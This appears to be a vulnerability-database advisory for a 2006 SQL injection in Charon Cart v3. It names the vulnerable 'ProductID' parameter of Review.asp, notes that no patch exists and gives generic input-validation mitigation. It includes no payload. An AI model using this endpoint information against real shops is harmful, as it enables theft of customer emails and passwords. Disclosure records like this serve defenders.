Vendor: Charon Cart v3
By: ajann
CVSS: 9 (HIGH)
SQL Injection
CWE: 89
Product Name: Charon Cart v3
Affected Version From: Charon Cart v3
Affected Version To: Charon Cart v3
Patch Exists: NO
Related CWE: N/A
CPE: a:charon:charon_cart_v3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
Charon Cart v3 (Review.asp) Remote SQL Injection Vulnerability
An attacker can exploit this vulnerability by sending specially crafted SQL through the vulnerable 'ProductID' parameter of the 'Review.asp' page. This allows the attacker to gain access to the database and extract sensitive information such as customer emails and passwords.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.